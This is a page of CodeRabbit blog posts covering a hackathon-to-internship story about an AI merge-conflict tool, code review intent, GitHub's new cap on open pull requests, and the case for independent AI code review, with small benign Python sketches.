CodeRabbit Blog

How a hackathon project turned into my work at CodeRabbit

Ayush Sridhar — Mon, 22 Jun 2026 00:00:00 GMT

In late October, I visited CodeRabbit’s offices to collect my prize from the CalHacks Hackathon. A few months later, I walked into the CodeRabbit office as a SWE intern.

That’s the headline. But the part that matters (especially if you’re a junior dev) isn’t “wow, lucky.” It’s the chain of events that made it possible:

![A four-step process: Build something real, Ask for help, Iterate fast, Follow up with proof.](https://victorious-bubble-f69a016683.media.strapiapp.com/image1_6866cdc78a.png)

This post is for junior developers who are trying to land internships in a market that feels tougher than it should be. I want to share the “unofficial path” that worked for me.

The technical project that started it all was **merj**, an AI-powered merge conflict resolver that used CodeRabbit to give an LLM the missing ingredient it needed to resolve conflicts correctly: semantic intent.

[https://youtube.com/shorts/6chYSna0\_QU?si=QooHLMvDyQEvXmHm](https://youtube.com/shorts/6chYSna0_QU?si=QooHLMvDyQEvXmHm)

I’ll also share what I’m working on now as an intern. I’m taking the same core idea and turning it into something that can help teams resolve PR merge conflicts with a workflow that fits cleanly into GitHub.

## **October: Hackathon chaos to hackathon WIN**

CalHacks is chaotic and energetic in the best way. There are half-coded demos, half-asleep teams, and a constant stream of “that doesn’t work, gotta fix that.”

My friends and I did what a lot of teams do at the start. We brainstormed a bunch of ideas, then walked around talking to sponsors and attendees to see what was feasible and what would actually be fun to build in a weekend.

That’s when we ran into CodeRabbit. At the time, we weren’t thinking “we need a code review product.” We were thinking like hackers: “We want to ship something ambitious in 36 hours, so how do we keep it from collapsing under rushed changes?” We realized CodeRabbit could help.
And that’s when we met [Hendrik Krack](https://www.linkedin.com/in/climateadvocateaienthusiast/), a developer advocate at CodeRabbit. This is the moment that changed everything.

Hendrik didn’t just tell us about the product. He helped us refine the actual project idea in a way that made CodeRabbit genuinely *useful* to the solution. Our early thinking was pretty typical hackathon thinking: “Throw some context into an LLM and hope it figures it out.” Hendrik pushed us toward a much better approach: “Don’t just give the model raw diffs. Give it semantic understanding of what each person was trying to do.”

That might sound obvious in hindsight. But in the middle of a hackathon, it’s easy to default to “LLM magic.” Hendrik helped us see what the LLM would actually *need* to succeed, and that became the core of our architecture.

Over the course of the hackathon, we stayed in contact with Hendrik and also met [Erik Thorelli](https://www.linkedin.com/in/erikthorelli/), the Dev Experience Lead at CodeRabbit. We attended their workshop, asked for input multiple times, and kept tightening our ideas based on what we learned.

![Five men stand by a large window overlooking a body of water and the distant horizon.](https://victorious-bubble-f69a016683.media.strapiapp.com/IMG_4210_3384a47ff8.jpg)

By the time presentations came around, we were showing something that had been iterated on with real feedback, and we even got the chance to present directly to them because they were so interested in what we were building.

We ended up winning CodeRabbit’s track. The prizes were amazing: Meta AI glasses and a visit to the CodeRabbit office that afternoon. But the part that stuck with me was the irony. I visited the office as a hackathon prize, and I had no idea I’d be working as an intern in that same office less than three months later.
## **What we built at CalHacks: merj, an AI-powered merge conflict resolver**

Our project was called **merj** (pronounced like “merge,” but slightly wrong on purpose).

**Problem:** Merge conflicts are one of the most tedious, annoying parts of software development. They show up at the worst times. They’re hard to reason about from conflict markers alone, and they’re a perfect example of “high friction, low reward” work. You’re not building something new. You’re just trying to get back to building.

So we asked: What if resolving a merge conflict could be as easy as running one command?

### **The user experience**

The tool was a CLI, and the entry point was simple:

`merge pull`

[https://www.youtube.com/watch?v=R1SPVzI1epU](https://www.youtube.com/watch?v=R1SPVzI1epU)

Under the hood, it would attempt a normal `git pull`. If Git complained about a merge conflict, merj would trigger a conflict-resolution workflow.

We designed it that way intentionally. We didn’t want “another AI chat tool.” We wanted something that fit the existing workflow developers already use.

## **The part that mattered most (and it wasn’t the prize)**

Over that weekend, Hendrik helped us refine our concept so we weren’t relying on “LLM magic.” He showed us how to use CodeRabbit’s semantic summaries as an intent layer, and he was generous with his time answering our questions about how CodeRabbit works and how it could integrate into our project.

Erik’s workshop helped us understand CodeRabbit more deeply so our integration became less hand-wavy and more real. We kept coming back for feedback, and each time, the project got better.

This is one of the most important lessons I’ve taken away as a junior dev: **Asking for help is a skill.
And when you do it well, with momentum and clarity, experienced engineers actually want to help.**

A good “ask for help” looks like:

* “Here’s the goal.”
* “Here’s what we built so far.”
* “Here’s what isn’t working.”
* “Here are two options we’re debating.”
* “What would you do next?”

That’s how you turn a sponsor booth conversation into a real connection.

## **The follow-up: How a hackathon turned into an internship**

The week after CalHacks, I reached out to Hendrik and Erik asking about potential internship opportunities and whether they could help me navigate the process.

They connected me with David Loker, CodeRabbit’s VP of Applied AI, and we set up an interview, which felt like a continuation of the hackathon:

* I thoroughly explained our project architecture.
* We talked about follow-ups and how to improve the product.
* We discussed how it might fit within CodeRabbit’s existing product.
* We went deeper on technical choices and failure modes.

I received an offer the next day.

I’m not sharing this to flex. I’m sharing it because it highlights something that matters in today’s environment: It’s easier for people to believe in you when you’ve already shown proof of how you think, build, and iterate.

## **Practical advice for junior devs (what I’d do again)**

I want to end with concrete advice, because I wish someone had told me this earlier.

### **1. Build things that force real engineering decisions**

Tutorials are fine. But the projects that change your trajectory are the ones with:

* Constraints
* Tradeoffs
* Failure modes
* Real integration points

Those are the projects that make interviews feel like conversations instead of interrogations.

### **2. Ask for help while you’re still building**

Don’t wait until it’s “perfect.” Ask early enough that feedback can change the design.

### **3. Make your ask easy to answer**

Respecting someone’s time isn’t about being silent; it’s about being clear.
Show:

* What you tried
* What broke
* What you think is happening
* What kind of feedback you want

### **4. Follow up with proof, not desperation**

“Here’s what I built and what I learned” is memorable. A generic “please give me a chance” message isn’t.

### **5. LeetCode can help you pass gates. Building creates doors.**

Interview prep matters, but building impressive things is what gets attention and creates opportunities.

## **The bottom line**

I landed an internship with CodeRabbit because I built something real, asked for help early, iterated fast, and followed up with proof.

And the wild part is that the loop is continuing. The hackathon project that started as a weekend experiment is now becoming a real product initiative I get to work on as an intern.

Don’t just apply harder in isolation if you’re a junior dev trying to stand out in a tough environment. Instead, build something you’re proud of and then get it in front of people who might be interested in it.
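
As a footnote to the user-experience section: the "try a normal `git pull`, then react to conflicts" flow can be sketched in a few lines of Python. This is only an illustration under stated assumptions, not merj's actual code. The names `git_runner`, `pull_with_resolution`, and the `resolve` callback (a stand-in for the LLM-backed resolution step) are hypothetical. The only real tooling it relies on is `git pull` and `git diff --name-only --diff-filter=U`, which lists unmerged paths.

```python
import subprocess
from typing import Callable, List, Tuple

# A runner takes git arguments and returns (exit code, stdout).
Runner = Callable[[List[str]], Tuple[int, str]]


def git_runner(cwd: str) -> Runner:
    """Build a runner that executes `git <args>` inside `cwd`."""
    def run(args: List[str]) -> Tuple[int, str]:
        proc = subprocess.run(
            ["git", *args], cwd=cwd, capture_output=True, text=True, check=False
        )
        return proc.returncode, proc.stdout
    return run


def pull_with_resolution(run: Runner, resolve: Callable[[str], bool]) -> dict:
    """Attempt a pull; if it fails with conflicts, hand each file to `resolve`.

    `resolve` is a hypothetical callback: it receives a conflicted path and
    returns True when it managed to resolve that file.
    """
    code, _ = run(["pull"])
    if code == 0:
        return {"status": "clean", "resolved": [], "unresolved": []}

    # Unmerged paths are how Git reports files that still contain conflicts.
    _, out = run(["diff", "--name-only", "--diff-filter=U"])
    files = [line.strip() for line in out.splitlines() if line.strip()]
    if not files:
        # The pull failed for some other reason (network, auth, dirty tree).
        return {"status": "pull_failed", "resolved": [], "unresolved": []}

    resolved = [path for path in files if resolve(path)]
    unresolved = [path for path in files if path not in resolved]
    status = "resolved" if not unresolved else "needs_attention"
    return {"status": status, "resolved": resolved, "unresolved": unresolved}
```

Passing the runner in as a parameter keeps the control flow testable without a real repository. In practice one would call `pull_with_resolution(git_runner("."), my_resolver)`, where `my_resolver` is whatever resolution step you plug in.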

The real bottleneck in code review isn't reviewing code, it is understanding it

Brandon Gubitosa — Fri, 19 Jun 2026 00:00:00 GMT

Be honest with yourself for a minute. When in the last quarter did you fully understand a pull request that was not yours? Seriously, did you trace the logic, check the ticket, inspect the edge cases, and think through what would happen in production? Or did you skim, get the gist, look for obvious red flags, and approve because you trusted the author and were slammed with “urgent” reviews?

That is the real state of code review on most teams. Engineers have not stopped caring about code quality. The problem is that the volume of code has outpaced the amount of attention and time any human can give it. Larger pull requests sit for days, architectural feedback gets rarer, and careful review turns into pattern matching once the diff gets larger than what one person can realistically hold in their head.

Open source maintainers live with this daily: contributing to projects became cheap, but reviewing code did not. A human still reads every pull request, deciphers what changed, understands why it was built that way, and decides if it conflicts with how the rest of the codebase works.

That is the reality of the new software development lifecycle (SDLC): reviewing agent-generated code is slowing teams down and pushing ROI from coding agents further out. Teams are applying the old review model they used for human-written code to code written by agents, even though a human reviewer can only hold so much code, context, and intent in their head at once.

We’ve rebuilt our code review interface for the agentic SDLC to help developers fully understand what is changing, why those changes matter, what the risk is, and what is actually about to ship.

## Reviewing human-written code and AI-generated code are different jobs

If you have been reviewing code for the last decade, you know the quiet truth that the process of reviewing code has always been a little broken, even before AI entered the equation.
Code review has always depended on a reviewer reconstructing intent from another person's brain. The author knows why the change exists and what behavior they meant to introduce. The reviewer gets a diff and has to reverse-engineer that logic in their own head before they can even start evaluating whether the change is correct.

AI amplifies the bottlenecks in code review across engineering teams. Teams are now pushing far more code through the same interfaces designed for human-written code, in larger and harder-to-understand diffs, often with less confidence that the author who opened the pull request fully understands the impact of the change.

That is where teams discover that reviewing human-written code and AI-generated code are different jobs. AI-generated code often reflects pattern completion and can miss codebase conventions, constraints, and architectural logic.

The failure modes of AI-generated code are measurable. [Our own research](https://www.coderabbit.ai/whitepapers/state-of-AI-vs-human-code-generation-report) found that logic and correctness problems are 75% more common in AI pull requests than in human ones. Security issues are up to 2.74x more common, and readability issues are more than 3x more common.

![Infographic detailing AI's increased security vulnerabilities, including password handling, XSS, and deserialization.](https://victorious-bubble-f69a016683.media.strapiapp.com/ai_makes_security_mistakes_297c14ae1b.png)

Those are not the kind of defects you catch by casually scanning a diff. They require deep context, careful reasoning, and time that most reviewers no longer have, now that the role of senior engineers has shifted to validating intent, pressure-testing risk, and deciding whether the change should exist at all.

These pressures aren't limited to AI-generated contributions, however. They highlight a universal reality. Human-written code and AI-generated code arrive through different paths, but fail in the same place.
Intent is still missing from the code review surface. The real bottleneck in code review, whether the code is human- or AI-generated, is understanding what the change was supposed to do, what constraints mattered, what could break, and whether the final behavior matches the original goal. Code review has always forced people to infer that from a diff, and AI makes the gap far more obvious.

## The code review bottleneck is understanding intent

The underlying factor in all of this is that the interface for reviewing code has not kept up with the shift toward agents writing a growing share of code. Current interfaces still assume that showing changed files in order is enough for someone to reconstruct the intent. It was a weak assumption before AI, and it is an even worse one now.

For code review to hold up in agentic workflows, it cannot live only in a raw diff viewer. It has to become a system that helps reviewers understand intent, isolate risk, and focus attention where judgment actually matters.

In agentic workflows, we must pivot from line-by-line inspection to intent validation. We need to answer: *Did the system build what we meant to build? Does the change respect existing codebase constraints?* This shift is essential because the volume of AI-generated code has long since outstripped our ability to inspect it manually.

To review code and understand intent better, teams need a verification layer that carries intent forward. It should make the shape of a change legible, connect related work across files, surface the non-obvious risk, and help a reviewer move through a pull request in the order that makes sense instead of the order the filesystem happens to return.

This shift matters because the bottleneck in code review has always been understanding intent well enough to judge whether a change is right, whether it is safe, and whether it actually does what the team intended.
AI did not change the nature of that bottleneck. It raised the rate of output dramatically, and teams now have to understand intent faster than the old review process was ever designed to support.

## Why we redesigned our interface to better understand intent

Reviewers still need to see the shape of a change, the order in which it should be read, the dependencies that matter, and the places where human judgment should slow down. When code generation accelerates, code review has to become better at carrying intent forward; otherwise teams gain no leverage and just move the bottleneck downstream.

That is the direction behind CodeRabbit Review. Instead of leaving a pull request as a flat list of files, it reorganizes the change into logical cohorts and ordered layers, anchors those layers to real code ranges, and adds diagrams when a visual explanation makes the change easier to understand.

![GitHub page displaying a pull request for adding description fields to API reference documentation.](https://victorious-bubble-f69a016683.media.strapiapp.com/image1_de49ea1371.png)

This means understanding relationships across changed blocks, mapping dependencies, and turning a diff into an explainable walkthrough instead of a pile of lines to review. The goal is not to flood teams with more AI commentary, but to remove the reconstruction step that has made code review slow and fragile for years.

Try [CodeRabbit Review](https://www.coderabbit.ai/blog/introducing-atlas-the-first-ai-native-code-review-interface) on your next PR. CodeRabbit Review is free for a limited time for every CodeRabbit user. You can find it by clicking Review Change Stack in the CodeRabbit PR summary comment.
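
To make "ordered layers" concrete, here is a minimal Python sketch of one way to turn dependencies between groups of changes into a reading order: a layered topological sort. It is an illustration only and makes no claim about how CodeRabbit Review works internally. The function name `review_layers` and the cohort names in the usage note are hypothetical; `graphlib.TopologicalSorter` is part of the Python standard library (3.9+).

```python
from graphlib import TopologicalSorter
from typing import Dict, List, Set


def review_layers(depends_on: Dict[str, Set[str]]) -> List[List[str]]:
    """Group cohorts into layers so each layer only builds on earlier ones.

    `depends_on` maps a cohort name to the cohorts it builds on. Cohorts in
    the same layer do not depend on each other and can be read in any order.
    Raises graphlib.CycleError if the dependencies contain a cycle.
    """
    sorter = TopologicalSorter(depends_on)
    sorter.prepare()
    layers: List[List[str]] = []
    while sorter.is_active():
        # Everything whose dependencies have already been placed is ready now.
        ready = sorted(sorter.get_ready())
        layers.append(ready)
        sorter.done(*ready)
    return layers
```

For example, with a hypothetical change where `tests` build on `handler`, and both `handler` and `docs` build on `schema`, calling `review_layers({"tests": {"handler"}, "handler": {"schema"}, "docs": {"schema"}})` puts `schema` in the first layer, `docs` and `handler` in the second, and `tests` in the last, regardless of where those files sit in the filesystem listing.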

GitHub gives maintainers a throttle for the AI pull request surge

David Kravets — Thu, 18 Jun 2026 00:00:00 GMT

Despite the obituaries for the pull request, it turns out the pull request is alive, loud, and moving faster than the human systems built to review it.

That is the real signal behind [GitHub’s announcement](https://github.blog/changelog/2026-06-17-limit-open-pull-requests-for-users-without-write-access/) to give open source maintainers the ability to set caps on how many concurrent pull requests outside contributors can keep open.

“Maintainers carry the trust layer of open source. As AI makes it easier to generate contributions, we want to give maintainers more choice in how they receive and review that work,” Ashley Wolf, Director of Open Source at GitHub, tells us about today’s new feature. “Pull requests are far from dead. They are evolving from simple code submissions into richer checkpoints for context, review, and accountability, and our job is to make sure maintainers have the controls they need as that evolution accelerates.”

The feature gives repository admins a direct control inside repository settings. Maintainers will be able to set a maximum number of open PRs for users without write access. Once a contributor reaches that limit, another PR waits until one of the existing PRs closes or merges. Trusted contributors can go on a bypass list without receiving full collaborator access.

The feature is simple. The signal is significant. GitHub is giving maintainers a throttle for a contribution system running at AI (slop) speed.

Camilla Moraes, a GitHub Project Manager on Maintainer Wins, says the move addresses the problem of “[AI Slop at Scale](https://github.com/orgs/community/discussions/197319),” and that GitHub has been working with maintainers on a solution to bring them relief.
“Earlier this year, we opened a discussion about a trend that’s been making maintainer’s lives harder: a flood of low-quality contributions that existing tools and workflows weren’t built to handle,” she [wrote](https://github.com/orgs/community/discussions/197319) on GitHub.

In short, GitHub is adding this control because the pull request queue has become a pressure point in the AI era, where cheap code meets scarce human review.

According to GitHub figures shared for this story, site-wide merged pull requests grew from 25 million per month in January 2023 to 90 million per month in March 2026, a 3.6x increase. Commits grew from 389 million per month to 1.4 billion per month, another roughly 3.6x increase.

GitHub framed the infrastructure version of this story in April. The company said it began a plan to increase capacity by 10X in October 2025 and, by February 2026, had moved toward a future requiring [30X today’s scale](https://github.blog/news-insights/company-news/an-update-on-github-availability/). GitHub tied that shift to agentic development workflows and said repository creation, pull request activity, API usage, automation, and large-repository workloads are all growing quickly.

![Three line graphs depict accelerating growth in pull requests, commits, and new repositories.](https://victorious-bubble-f69a016683.media.strapiapp.com/image1_a323ef8679.png)

**Image source: GitHub**

The social version of the story feels even more immediate. Maintainers feel the heat first. Wolf described the moment as open source’s “Eternal September.” The company wrote that generative AI makes it easy to produce code, issues, and security reports at scale, and captured the core tension in one clean line. “[The cost to create has dropped but the cost to review has not](https://github.blog/open-source/maintainers/welcome-to-the-eternal-september-of-open-source-heres-what-we-plan-to-do-for-maintainers/).”

That line, at its core, explains the new PR cap.
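
The rule behind the cap, as described above, is small enough to write down. The Python sketch below is only a model of that described behavior, not GitHub's implementation or API: the class name `PullRequestCap` and its fields are hypothetical, and the real control is configured in repository settings rather than in code.

```python
from dataclasses import dataclass, field
from typing import Set


@dataclass
class PullRequestCap:
    """Hypothetical model of a per-contributor cap on open pull requests."""

    max_open: int
    bypass: Set[str] = field(default_factory=set)

    def can_open(self, user: str, has_write_access: bool, open_count: int) -> bool:
        """Return True if `user` may open one more PR right now.

        The cap only applies to users without write access who are not on
        the bypass list. Everyone else is unaffected.
        """
        if has_write_access or user in self.bypass:
            return True
        # At the limit, the next PR has to wait until one closes or merges.
        return open_count < self.max_open
```

With `PullRequestCap(max_open=3, bypass={"trusted-dev"})`, a newcomer with two open PRs can open a third but not a fourth, while `trusted-dev` keeps moving without being made a collaborator.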
## **A new middle path for maintainers**

GitHub already shipped two foundational PR access controls in February. Maintainers can disable pull requests entirely, or [restrict PR creation to collaborators only](https://github.blog/changelog/2026-02-13-new-repository-settings-for-configuring-pull-request-access/). GitHub said those settings give maintainers more control over how repositories accept contributions, especially for mirrors, read-only codebases, and projects that want public code without a public contribution queue.

The new PR cap, however, adds a finer, more flexible control. It targets a specific noisy pattern: a small number of users opening many PRs against the same repository in a short period. Moraes [describes](https://github.com/orgs/community/discussions/197319) the cap as “one of the simplest and highest-impact controls” GitHub can ship, because it creates a practical middle ground between fully open PRs and collaborator-only restrictions.

That middle ground matters. Open source thrives on porous boundaries. Maintainers also need quiet rooms, clean queues, and reliable signals. A cap lets a maintainer say yes to new contributors while protecting the review lane from a flood. A bypass list lets trusted contributors keep moving. The result is a more textured trust model, warm enough for community and firm enough for scale.

## **The community asked for this**

Maintainers and contributors have been asking for more PR control for years, even before the AI-coding wave took off. In a 2021 GitHub Community discussion titled “[Request, Ability to turn off Pull Requests](https://github.com/orgs/community/discussions/8907),” one user wrote that sometimes maintainers “just want to share code and don’t want the burden of maintaining it, triaging issues or pull requests.” The same request said it would be useful to disable PRs the same way projects can disable issues.

The AI era sharpened that request into something more urgent.
In a 2026 GitHub Community [discussion](https://github.com/orgs/community/discussions/185387) about low-quality contributions, one commenter wrote, “Giving repo owners the ability to ‘rate-limit’ PRs from contributors is probably a good idea.” Another comment described the suspicious pattern directly, noting that “You haven’t contributed to this project before and now you are filling 30 PRs” looks unlike normal human contribution behavior.

These examples, [and many others](https://github.com/orgs/community/discussions/185387), all point to the same bright, uncomfortable truth. Creation is abundant. Review is scarce.

## **GitHub is rebuilding the maintainer cockpit**

The PR cap sits inside a wider GitHub product push for maintainers. GitHub’s Maintainer Month “Ships for Maintainers” [page](https://maintainermonth.github.com/ships) lists **40** features and updates built for open source maintainers, including **8** in pull requests, **6** in issues, **4** in notifications, and **3** in moderation.

Several of those changes clearly map to the PR surge.

GitHub moved the global pull requests [dashboard](https://github.blog/changelog/2026-04-23-global-pull-requests-dashboard-moves-to-opt-out-public-preview/) into opt-out public preview. The dashboard gives users a unified place to manage PRs, with filters by organization and repository, saved views, inbox sections for drafts and review needs, unread indicators, and status checks visible from the list view.

GitHub [added repository member role labels](https://github.blog/changelog/2026-04-09-repository-member-role-labels-now-in-pull-request-list-view/) directly to public repository PR lists, including labels such as `First-time contributor`, `Contributor`, and `Member`. GitHub said the change helps maintainers triage PRs faster by showing contributor history at a glance.
GitHub [redesigned the PR Files changed page](https://github.blog/changelog/2026-03-19-view-code-and-comments-side-by-side-in-pull-request-files-changed-page/) with docked panels so reviewers can keep overview, comments, merge status, and alerts open alongside the diff. The alerts panel surfaces code scanning alerts next to the code review itself.

GitHub also added [quick merge-status access inside PRs](https://github.blog/changelog/2026-03-05-quick-access-to-merge-status-in-pull-requests-in-public-preview/), giving reviewers a faster way to spot blockers, missing approvals, and readiness signals.

Moderation is getting sharper too. GitHub added a “[Low Quality](https://github.blog/changelog/2026-04-09-new-low-quality-option-in-the-hide-comment-menu/)” option to the Hide comment menu across issues, discussions, pull requests, and commits, saying older categories such as spam and abuse failed to capture the growing volume of unhelpful comments.

[Notifications](https://github.blog/changelog/2026-04-09-new-sort-by-control-added-to-notifications/) are getting cleaner. GitHub added oldest-to-newest sorting so maintainers can work through backlogs methodically, and it improved handling for notifications [triggered by spammy repositories](https://github.blog/changelog/2025-12-04-notifications-triggered-by-spam-accounts-are-now-correctly-hidden/) and users.

The [roadmap](https://github.com/orgs/community/discussions/197319) keeps going. GitHub says PR archiving is coming soon, giving admins a way to remove low-quality or spammy PRs from the main list while preserving historical context. GitHub also plans issue limits, issue restrictions for collaborators only, more granular interaction limits, and possible global rate limits for users who spray activity across many repositories.

Taken together, these changes form a new maintainer cockpit with more filters, more signals, more throttles, and more calm.

## **The pull request is alive**

The pull request has always been more than a diff.
It is where code meets trust. AI makes that trust work louder and more demanding. A generated PR can look polished, pass tests, and still miss the project’s architecture, taste, history, and intent. A human maintainer still pays the cognitive cost. Every review carries the soft grind of context switching, the sharp smell of risk, and the quiet burden of ownership. GitHub’s new caps acknowledge that reality with welcome clarity. The answer to abundant contribution is better flow control. Open source needs invitation, mentorship, and access. It also needs boundaries sturdy enough to protect the people doing the work. The best version of this future keeps the door open and gives maintainers a handle on the door. The pull request is alive. GitHub is now giving maintainers the throttle they need to keep it somewhat healthy.

The more AI writes the code, the more review needs independence

Yiwen Xu — Wed, 17 Jun 2026 00:00:00 GMT

On June 16, 2026, [SpaceX agreed to buy](https://techcrunch.com/2026/06/16/spacex-to-acquire-cursor-for-60b-in-stock-days-after-blockbuster-ipo/) AI coding start-up Cursor for $60 billion in an all-stock deal. Cursor helps developers write code and also reviews code through Bugbot. Put that inside a broader corporate stack that already owns infrastructure, models, and generation, and the question for engineering teams becomes unavoidable. Should the same AI stack that writes the code also be trusted to review it?

In school, we call that grading your own homework, and in software, the stakes are higher. The code may compile, the agent may explain itself, and the reviewer may sound confident, but confidence is not verification.

As AI writes more of the code teams ship, an independent reviewer becomes the safeguard that keeps teams moving fast without sacrificing quality. It also brings separation of duties to AI development, making sure the system that helps create the code is not the same one deciding whether it is safe to ship. For enterprise teams, this is a way to get ahead of the governance and regulatory expectations forming around AI-generated software.

## A model is a poor judge of its own work

Consolidation in this market is moving quickly, with AI coding platforms adding their own review features. Cursor’s Bugbot [defaults to using Composer 2.5](https://cursor.com/blog/bugbot-updates-june-2026) for code review, the same model family used to generate code. The convenience is real, but when the same stack writes and reviews the code, it can carry the same assumptions into both steps, which makes it more likely to repeat the same oversight rather than catch it.

[One study](https://arxiv.org/abs/2507.02778) found that large language models exhibit a Self-Correction Blind Spot, with a 64.5% average failure rate when asked to correct errors they produced themselves.
[A separate analysis](https://arxiv.org/abs/2507.06920) found that generated code passed 9 to 17 percentage points more often when it was tested by models in the same family than when it was tested independently. Models that share training tend to share blind spots and often fall into the Homogenization Trap, so a model checking its own output is inclined to approve it.

The volume of AI-generated code makes this harder to ignore. Industry data points to a [14x increase in GitHub commits in 2026](https://daringfireball.net/linked/2026/05/04/commits-on-github-are-up-14x-year-over-year) attributed to AI coding, and a [40% increase in critical issues found in pull requests.](https://www.coderabbit.ai/blog/state-of-ai-vs-human-code-generation-report) There is also an [81% increase in secrets leaked in code,](https://blog.gitguardian.com/the-state-of-secrets-sprawl-2026/) alongside an explainability gap in which AI is outpacing human comprehension of code [by 5 to 7x.](https://byteiota.com/cognitive-debt-ai-coding-agents-outpace-comprehension-5-7x/)

Code review functions as the final checkpoint before production, and that checkpoint can’t be trusted when the same model both produces the code and signs off on it.

## Compliance frameworks are moving in this direction

Separating the author of a change from its reviewer is not a new idea. It is an established governance practice, borrowed from how finance has handled trust for decades.

After the [Enron](https://en.wikipedia.org/wiki/Enron_scandal) and [WorldCom](https://internationalbanker.com/history-of-financial-crises/the-worldcom-scandal-2002/) scandals, where the creator and the reviewer of financial records shared incentives, the [Sarbanes-Oxley Act](https://www.sarbanes-oxley-act.com) required companies to separate the external auditor from the accountant. The separation worked because it removed the conflict at the source rather than auditing around it.
What reads today as good practice is beginning to look like a requirement. SOC 2, the AICPA framework that many enterprise buyers ask their vendors to meet, addresses the issue. Control CC8.1 governs change management and calls for [Segregation of Duties](https://macpas.com/how-why-segregation-of-duties-is-important-for-change-controls/) (SoD). The principle is that the party that authors a change cannot also approve it and push it to production without independent review.

Engineering leaders who decouple authoring from review today are proactively de-risking the AI pipeline ahead of any mandate, and turning a future compliance obligation into a present advantage.

This is already appearing in enterprise purchasing conversations. One engineering director at a quality engineering platform put it plainly: their security team “doesn’t feel that using the same tool for coding and PR reviews is a good idea.” An engineering leader at a security company put it even more directly: “We do not necessarily want the AI coding assistant vendor to also be our PR review vendor.”

## How CodeRabbit delivers independent, explainable AI code review with the best ROI

### Built to review independently

By nature, CodeRabbit separates the writer from the reviewer. It's platform-agnostic and operates independently of coding agents, running alongside tools like Cursor, Codex, Claude Code, and Copilot rather than being bundled into the same generation stack.

Under the hood, CodeRabbit uses an ensemble of models instead of relying on a single model for the entire review. Compact models handle context distillation, while larger multi-step reasoning models are reserved for more complex tasks. Multiple models work together, each focused on the task it is best suited to do.

This design also improves resilience. If one model provider is degraded or unavailable, reviews can continue through other models, reducing dependence on a single model provider.
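
The resilience point can be illustrated with a generic fallback pattern. The Python sketch below is a simplified illustration under stated assumptions, not CodeRabbit's actual architecture: `review_with_fallback`, `AllProvidersFailed`, and the provider callables are hypothetical names, and a real system would add timeouts, retries, and health checks.

```python
from typing import Callable, List, Sequence, Tuple

# A reviewer is a (provider name, callable that reviews a diff) pair.
Reviewer = Tuple[str, Callable[[str], str]]


class AllProvidersFailed(RuntimeError):
    """Raised when every configured provider failed to produce a review."""


def review_with_fallback(diff: str, reviewers: Sequence[Reviewer]) -> Tuple[str, str]:
    """Try each provider in order and return (provider name, review text).

    A failure from one provider is recorded and the next one is tried, so a
    single degraded provider does not stop the review.
    """
    errors: List[str] = []
    for name, call in reviewers:
        try:
            return name, call(diff)
        except Exception as exc:  # any provider failure triggers fallback
            errors.append(f"{name}: {exc}")
    raise AllProvidersFailed("; ".join(errors))
```

The caller passes providers in order of preference. If the first one raises (for example, on a timeout), the review is produced by the next one, and the returned name records which provider actually answered.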
[Cost efficiency](https://www.coderabbit.ai/blog/out-with-tokenmaxxing-in-with-mergemaxxing) is another benefit of the multi-model approach, giving engineering teams the best ROI in code review. Teams get high-performance review, predictable seat-based pricing, and flexible usage-based add-ons for high-throughput agentic loops. ![Diagram showing CodeRabbit's independent code review system using an ensemble of AI models.](https://victorious-bubble-f69a016683.media.strapiapp.com/image1_a75ce4ade4.png) ### The purpose-built and explainable review layer teams can trust As more code is generated by AI, explainability is becoming the missing layer in code review. CodeRabbit has long provided structured summaries and walkthrough comments for every pull request. The recently launched [CodeRabbit Review](https://www.coderabbit.ai/blog/introducing-atlas-the-first-ai-native-code-review-interface) feature takes explainability further by turning the diff into a guided, layer-by-layer walkthrough. ![Code editor shows a diff view of a Kotlin configuration file with highlighted code changes.](https://victorious-bubble-f69a016683.media.strapiapp.com/Code_Peek_602a3cf6b6.png) It identifies semantic relationships between changes, groups related code blocks into logical cohorts, and orders those cohorts by dependency. Instead of reviewing a PR file by file, human reviewers can follow the change in the order the system actually fits together. It is like having a senior engineer walk you through the PR. ## What the Cursor acquisition means for engineering leaders The Cursor deal makes the trust problem obvious. More of the software development lifecycle is being pulled into the same vendor stack, from writing code to reviewing it. That may be convenient, but it raises a question every engineering team should ask. Should the same system that helped create the code also decide whether it is safe to ship? Independent review exists for a reason. 
Models can miss their own mistakes, and models from the same family tend to share the same blind spots. Engineering leaders already identified the risk, and established change-management practices also recognize the value of separating the author of a change from its reviewer. CodeRabbit gives teams that independent review layer, combined with a specialized, feature-rich platform for explainable code review. Teams can validate AI-generated and human-written code, understand why issues were flagged, catch defects before production, and ship faster with confidence. Proactively de-risk your AI development pipeline with independent, explainable code review. CodeRabbit comes with a rich feature set, enterprise controls, and governance built in, battle-tested across more than 15,000 engineering teams. [Talk to our sales team](https://www.coderabbit.ai/contact-us/sales) to learn more.

Out with Tokenmaxxing. In with Mergemaxxing

Yiwen Xu — Tue, 16 Jun 2026 00:00:00 GMT

[Token prices fell 98% since late 2022 yet enterprise AI bills tripled](https://thenextweb.com/news/token-prices-fell-98-enterprise-ai-bills-tripled-now-the-industry-wants-a-standards-body-to-explain-why). Uber burned through its entire 2026 AI coding budget by April, per [TechCrunch](https://techcrunch.com/2026/06/02/uber-caps-employee-ai-spending-after-blowing-through-budget-in-four-months/). [Gartner](https://www.gartner.com/document-reader/document/7280630) predicts that by 2027, 40% of enterprises using consumption-priced AI coding tools will face unplanned costs exceeding twice their expected budgets, increasing demand for structured cost oversight and optimization strategies. For a while, the industry treated token consumption as a proxy for ambition: the more your agents burned, the more "AI-forward" you were. This logic is flawed because tokens are an input, not an outcome. [Goodhart’s Law](https://en.wikipedia.org/wiki/Goodhart%27s_law) applies here: once token consumption becomes the target, it stops being a useful measure of effectiveness. The industry learned this lesson once before with [lines of code](https://getdx.com/blog/lines-of-code/) as a metric for developer productivity. Companies are now relearning it with tokens, and the focus is shifting towards measuring outcomes per dollar spent. Nowhere does this matter more than in AI code review. The outcome you are buying is not tokenmaxxing; it is high-quality code, merged and shipped with confidence. That means the system you choose should be optimized for what we call mergemaxxing: maximizing pull request merge velocity without compromising quality or cost. Most systems are not built to optimize quality and cost at the same time. ## Quality at any cost: The brute-force approach One approach to AI code review is to optimize for quality by maximizing token spend. 
